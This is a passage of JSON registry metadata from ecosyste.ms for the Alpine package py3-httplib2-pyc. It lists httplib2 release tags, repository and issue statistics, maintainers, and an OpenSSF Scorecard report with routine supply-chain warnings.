11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T11:01:28.501Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.19","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":282,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2026-03-10T13:08:39.138Z","updated_at":"2026-03-10T13:08:39.138Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.19","url":"https://pkgs.alpinelinux.org/packages?branch=v3.19","ecosystem":"alpine","default":false,"packages_count":23031,"maintainers_count":392,"namespaces_count":2,"keywords_count":3176,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":960},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-12-20T09:51:56.346Z","updated_at":"2026-08-25T05:07:15.581Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/namespaces"}},{"id":7778933,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-04-19T14:25:43.000Z","latest_release_published_at":"2023-04-19T14:25:43.000Z","latest_release_number":"0.22.0-r1","last_synced_at":"2026-03-10T15:24:17.736Z","created_at":"2023-05-22T14:25:54.695Z","updated_at":"2026-08-22T11:41:27.898Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifes